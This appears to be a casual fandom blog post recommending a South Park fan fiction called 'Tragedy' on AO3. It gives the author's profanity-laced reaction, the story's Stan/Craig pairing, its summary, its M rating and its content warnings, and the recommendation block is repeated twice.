I really let myself go on this one.
Usually I'm one of those people who substitutes swear words with other words like, for example, "fudge" instead of "fuck".
The amount of shit I spit out is just obscene. (Ew.)
That was nightmare material right there.
Why the fuck did I have to think that?? (Wat.)
My brain melted into a freaking puddle of goo.
Staig / Cran
Liberal amounts of angst, angst, and angst with a dash of fluff and a sprinkle of the majestic act of sexual intercourse. Maybe. I actually have no idea if they went all the way 'cuz I kinda' skipped that part...
But Craig implied(said) they did so I'm just gonna' continue with the notion that they did in fact, excuse my crude language, fuck.
Tragedy @ AO3 by monthadog
Summary: Stan Marsh never hung around Craig Tucker until he was invited to an end-of-the-year party at Token's place. Suddenly he can't imagine life without the stoic asshole. Craig is far from perfect and the more involved with him Stan becomes the more everything begins falling apart.
Rating: M
Warning(s): The usual. Drugs, sex, booze, abuse, etc.
Staig / Cran
Liberal amounts of angst, angst, and angst with a dash of fluff and a sprinkle of the majestic act of sexual intercourse. Maybe. I actually have no idea if they went all the way 'cuz I kinda' skipped that part...
But Craig implied(said) they did so I'm just gonna' continue with the notion that they did in fact, excuse my crude language, fuck.
Tragedy @ AO3 by monthadog
Summary: Stan Marsh never hung around Craig Tucker until he was invited to an end-of-the-year party at Token's place. Suddenly he can't imagine life without the stoic asshole. Craig is far from perfect and the more involved with him Stan becomes the more everything begins falling apart.
Rating: M
Warning(s): The usual. Drugs, sex, booze, abuse, etc.
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